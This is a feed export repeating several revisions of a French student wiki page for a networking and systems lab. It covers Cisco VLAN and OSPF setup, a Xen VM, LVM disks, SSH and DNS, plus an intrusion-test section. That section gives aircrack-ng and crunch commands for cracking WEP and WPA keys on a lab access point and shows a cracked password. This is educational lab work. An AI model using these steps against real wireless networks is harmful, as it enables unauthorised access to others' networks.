 mkfs.ext4 /dev/storage/Anosteke1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke2&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les 2 disques au fichier de configuration de notre VM &lt;br /&gt;
&lt;br /&gt;
 nano /etc/xen/Anosteke.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke1,xvda3,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 vif         = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
On peut ensuite démarrer notre VM&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/AnosTeke.cfg&lt;br /&gt;
&lt;br /&gt;
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces&lt;br /&gt;
&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements&lt;br /&gt;
&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
On les configure DUMP disabled et Fsck 2.&lt;br /&gt;
On peut finalement lancer le MOUNT&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
et vérifier la bonne execution&lt;br /&gt;
 lsblk&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
sur le serveur nous pouvons vérifier que notre machine existe : &lt;br /&gt;
 xen-list-images | grep Name: %nom de la vm%&lt;br /&gt;
 lsblk | grep %nom de la vm%&lt;br /&gt;
et finalement pour lister les machines en fonctionnement&lt;br /&gt;
 xen list&lt;br /&gt;
&lt;br /&gt;
On peut ensuite se connecter à la machine&lt;br /&gt;
 xen console Anosteke&lt;br /&gt;
&lt;br /&gt;
On en profite pour ajouter un nouvel utilisateur&lt;br /&gt;
 sudo adduser pifou&lt;br /&gt;
&lt;br /&gt;
Et installer les paquets&lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get upgrade&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
On vérifie que OpenSSH est installé &lt;br /&gt;
 ssh -V&lt;br /&gt;
&lt;br /&gt;
Si il ne l'est pas on l'install. &lt;br /&gt;
 sudo apt install openssh-server&lt;br /&gt;
&lt;br /&gt;
Pour lancer et arreter le service SSH : &lt;br /&gt;
 sudo service ssh stop&lt;br /&gt;
 sudo service ssh start&lt;br /&gt;
&lt;br /&gt;
Pour desactiver le service : &lt;br /&gt;
 sudo systemctl disable ssh&lt;br /&gt;
&lt;br /&gt;
Pour connaitre l'état du service : &lt;br /&gt;
 sudo systemctl status ssh&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config&lt;br /&gt;
 /etc/ssh&lt;br /&gt;
 ├── ssh_config&lt;br /&gt;
 ├── sshd_config&lt;br /&gt;
 ├── ssh_host_rsa_key&lt;br /&gt;
 └── ssh_host_rsa_key.pub&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier on modifie les paramètres suivants : &lt;br /&gt;
 Port 22&lt;br /&gt;
 LogLevel VERBOSE&lt;br /&gt;
 PermitRootLogin no&lt;br /&gt;
 Banner /etc/ssh/banner&lt;br /&gt;
&lt;br /&gt;
On redemarre ensuite le service SSH&lt;br /&gt;
 systemctl reaload ssh.service&lt;br /&gt;
&lt;br /&gt;
=== Serveur DNS ===&lt;br /&gt;
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net&lt;br /&gt;
&lt;br /&gt;
On install :&lt;br /&gt;
 apt-get install bind9&lt;br /&gt;
On peut aussi installer le paquet dsnutils pour débugger le service DNS &lt;br /&gt;
&lt;br /&gt;
Configuration du fichier /etc/bind/named.conf.options&lt;br /&gt;
 listen-on {any;};&lt;br /&gt;
 allow-recursion  {localhost;};&lt;br /&gt;
&lt;br /&gt;
On configure ensuite le bind de notre nom de domaine.&lt;br /&gt;
 /etc/bind/db.anosteke59.site                        &lt;br /&gt;
 $TTL 86400&lt;br /&gt;
 @       IN      SOA     ns.anosteke59.site.      postmaster.anosteke59.site. (&lt;br /&gt;
                         2021112901      ; serial number YYMMDDNN&lt;br /&gt;
                         28800           ; Refresh&lt;br /&gt;
                         7200            ; Retry&lt;br /&gt;
                         864000          ; Expire&lt;br /&gt;
                         86400           ; Min TTL&lt;br /&gt;
                         )&lt;br /&gt;
                 NS      ns.anosteke59.site.&lt;br /&gt;
                 NS      ns6.gandi.net. &lt;br /&gt;
 $ORIGIN anosteke59.site.&lt;br /&gt;
 ns  IN A   193.48.57.182&lt;br /&gt;
 www IN CNAME ns&lt;br /&gt;
&lt;br /&gt;
On vérifie que la configuration est cohérente à l'aide de &lt;br /&gt;
 named-checkzone anosteke59.site /etc/bind/db.anosteke59.site &lt;br /&gt;
&lt;br /&gt;
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)&lt;br /&gt;
nslookup anosteke59.site &lt;br /&gt;
dig anosteke59.site&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
Sur le serveur Xen, on créer nos volumes. &lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-1 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-2 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-3 storage&lt;br /&gt;
&lt;br /&gt;
Qu'on ajoute à la configuration de notre VM&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
=== Inspection ARP par un élément réseau ===&lt;br /&gt;
===  Sécurisation WiFi par WPA2-EAP ===&lt;br /&gt;
&lt;br /&gt;
=== Tests d’intrusion ===&lt;br /&gt;
== WEP ==&lt;br /&gt;
On commence par casser la clé WEP.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
puis on lance &lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
3 représente la channel utilisée par l'ap (ici 3)&lt;br /&gt;
&lt;br /&gt;
Notre interface est renommée 'wlan0mon'.&lt;br /&gt;
Pour visualiser les paquets sniffés, on execute alors&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est ??? On lance alors la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -w dump -c 3 --bssid ??? wlan0mon&lt;br /&gt;
&lt;br /&gt;
Après quelques minutes, on execute :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng dump*.cap&lt;br /&gt;
&lt;br /&gt;
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID de kracotte07 : ??? On récupère ensuite des handshakes avec la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 --bssid ??? -w dumpWPA wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Enfin, on lance la commande :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b ??? dumpWPA.cap&lt;br /&gt;
&lt;br /&gt;
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56967</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56967"/>
				<updated>2021-12-13T14:58:45Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* WEP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
==Répartition travail==&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Configuration IPV4 ===&lt;br /&gt;
&lt;br /&gt;
==== Paramétrage des VLANs ====&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==== OPSF ====&lt;br /&gt;
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
 router-id 10.00.0.1                                   &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
 summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
 redistribute connected subnets                       &lt;br /&gt;
 redistribute static subnets                                                                                                                         &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation ==&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les 2 disques virtuels &lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n Anosteke1 storage&lt;br /&gt;
 lvcreate -L10G -n Anosteke2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les formatons&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke2&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les 2 disques au fichier de configuration de notre VM &lt;br /&gt;
&lt;br /&gt;
 nano /etc/xen/Anosteke.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke1,xvda3,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 vif         = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
On peut ensuite démarrer notre VM&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/AnosTeke.cfg&lt;br /&gt;
&lt;br /&gt;
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces&lt;br /&gt;
&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements&lt;br /&gt;
&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
On les configure DUMP disabled et Fsck 2.&lt;br /&gt;
On peut finalement lancer le MOUNT&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
et vérifier la bonne execution&lt;br /&gt;
 lsblk&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
sur le serveur nous pouvons vérifier que notre machine existe : &lt;br /&gt;
 xen-list-images | grep Name: %nom de la vm%&lt;br /&gt;
 lsblk | grep %nom de la vm%&lt;br /&gt;
et finalement pour lister les machines en fonctionnement&lt;br /&gt;
 xen list&lt;br /&gt;
&lt;br /&gt;
On peut ensuite se connecter à la machine&lt;br /&gt;
 xen console Anosteke&lt;br /&gt;
&lt;br /&gt;
On en profite pour ajouter un nouvel utilisateur&lt;br /&gt;
 sudo adduser pifou&lt;br /&gt;
&lt;br /&gt;
Et installer les paquets&lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get upgrade&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
On vérifie que OpenSSH est installé &lt;br /&gt;
 ssh -V&lt;br /&gt;
&lt;br /&gt;
Si il ne l'est pas on l'install. &lt;br /&gt;
 sudo apt install openssh-server&lt;br /&gt;
&lt;br /&gt;
Pour lancer et arreter le service SSH : &lt;br /&gt;
 sudo service ssh stop&lt;br /&gt;
 sudo service ssh start&lt;br /&gt;
&lt;br /&gt;
Pour desactiver le service : &lt;br /&gt;
 sudo systemctl disable ssh&lt;br /&gt;
&lt;br /&gt;
Pour connaitre l'état du service : &lt;br /&gt;
 sudo systemctl status ssh&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config&lt;br /&gt;
 /etc/ssh&lt;br /&gt;
 ├── ssh_config&lt;br /&gt;
 ├── sshd_config&lt;br /&gt;
 ├── ssh_host_rsa_key&lt;br /&gt;
 └── ssh_host_rsa_key.pub&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier on modifie les paramètres suivants : &lt;br /&gt;
 Port 22&lt;br /&gt;
 LogLevel VERBOSE&lt;br /&gt;
 PermitRootLogin no&lt;br /&gt;
 Banner /etc/ssh/banner&lt;br /&gt;
&lt;br /&gt;
On redemarre ensuite le service SSH&lt;br /&gt;
 systemctl reaload ssh.service&lt;br /&gt;
&lt;br /&gt;
=== Serveur DNS ===&lt;br /&gt;
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net&lt;br /&gt;
&lt;br /&gt;
On install :&lt;br /&gt;
 apt-get install bind9&lt;br /&gt;
On peut aussi installer le paquet dsnutils pour débugger le service DNS &lt;br /&gt;
&lt;br /&gt;
Configuration du fichier /etc/bind/named.conf.options&lt;br /&gt;
 listen-on {any;};&lt;br /&gt;
 allow-recursion  {localhost;};&lt;br /&gt;
&lt;br /&gt;
On configure ensuite le bind de notre nom de domaine.&lt;br /&gt;
 /etc/bind/db.anosteke59.site                        &lt;br /&gt;
 $TTL 86400&lt;br /&gt;
 @       IN      SOA     ns.anosteke59.site.      postmaster.anosteke59.site. (&lt;br /&gt;
                         2021112901      ; serial number YYMMDDNN&lt;br /&gt;
                         28800           ; Refresh&lt;br /&gt;
                         7200            ; Retry&lt;br /&gt;
                         864000          ; Expire&lt;br /&gt;
                         86400           ; Min TTL&lt;br /&gt;
                         )&lt;br /&gt;
                 NS      ns.anosteke59.site.&lt;br /&gt;
                 NS      ns6.gandi.net. &lt;br /&gt;
 $ORIGIN anosteke59.site.&lt;br /&gt;
 ns  IN A   193.48.57.182&lt;br /&gt;
 www IN CNAME ns&lt;br /&gt;
&lt;br /&gt;
On vérifie que la configuration est cohérente à l'aide de &lt;br /&gt;
 named-checkzone anosteke59.site /etc/bind/db.anosteke59.site &lt;br /&gt;
&lt;br /&gt;
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)&lt;br /&gt;
nslookup anosteke59.site &lt;br /&gt;
dig anosteke59.site&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
Sur le serveur Xen, on créer nos volumes. &lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-1 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-2 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-3 storage&lt;br /&gt;
&lt;br /&gt;
Qu'on ajoute à la configuration de notre VM&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
=== Inspection ARP par un élément réseau ===&lt;br /&gt;
===  Sécurisation WiFi par WPA2-EAP ===&lt;br /&gt;
&lt;br /&gt;
=== Tests d’intrusion ===&lt;br /&gt;
== WEP ==&lt;br /&gt;
On commence par casser la clé WEP.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
puis on lance &lt;br /&gt;
&lt;br /&gt;
 airmon-ng start NOM_DE_L_INTERFACE 3&lt;br /&gt;
&lt;br /&gt;
3 représente la channel utilisée par l'ap (ici 3)&lt;br /&gt;
&lt;br /&gt;
Notre interface est renommée 'wlan0mon'.&lt;br /&gt;
Pour visualiser les paquets sniffés, on execute alors&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est ??? On lance alors la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -w dump -c 3 --bssid ??? wlan0mon&lt;br /&gt;
&lt;br /&gt;
Après quelques minutes, on execute :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng dump*.cap&lt;br /&gt;
&lt;br /&gt;
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID de kracotte07 : ??? On récupère ensuite des handshakes avec la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 --bssid ??? -w dumpWPA wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Enfin, on lance la commande :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b ??? dumpWPA.cap&lt;br /&gt;
&lt;br /&gt;
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56963</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56963"/>
				<updated>2021-12-13T14:55:14Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
==Répartition travail==&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Configuration IPV4 ===&lt;br /&gt;
&lt;br /&gt;
==== Paramétrage des VLANs ====&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==== OPSF ====&lt;br /&gt;
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
 router-id 10.00.0.1                                   &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
 summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
 redistribute connected subnets                       &lt;br /&gt;
 redistribute static subnets                                                                                                                         &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation ==&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les 2 disques virtuels &lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n Anosteke1 storage&lt;br /&gt;
 lvcreate -L10G -n Anosteke2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les formatons&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke2&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les 2 disques au fichier de configuration de notre VM &lt;br /&gt;
&lt;br /&gt;
 nano /etc/xen/Anosteke.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke1,xvda3,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 vif         = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
On peut ensuite démarrer notre VM&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/AnosTeke.cfg&lt;br /&gt;
&lt;br /&gt;
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces&lt;br /&gt;
&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements&lt;br /&gt;
&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
On les configure DUMP disabled et Fsck 2.&lt;br /&gt;
On peut finalement lancer le MOUNT&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
et vérifier la bonne execution&lt;br /&gt;
 lsblk&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
sur le serveur nous pouvons vérifier que notre machine existe : &lt;br /&gt;
 xen-list-images | grep Name: %nom de la vm%&lt;br /&gt;
 lsblk | grep %nom de la vm%&lt;br /&gt;
et finalement pour lister les machines en fonctionnement&lt;br /&gt;
 xen list&lt;br /&gt;
&lt;br /&gt;
On peut ensuite se connecter à la machine&lt;br /&gt;
 xen console Anosteke&lt;br /&gt;
&lt;br /&gt;
On en profite pour ajouter un nouvel utilisateur&lt;br /&gt;
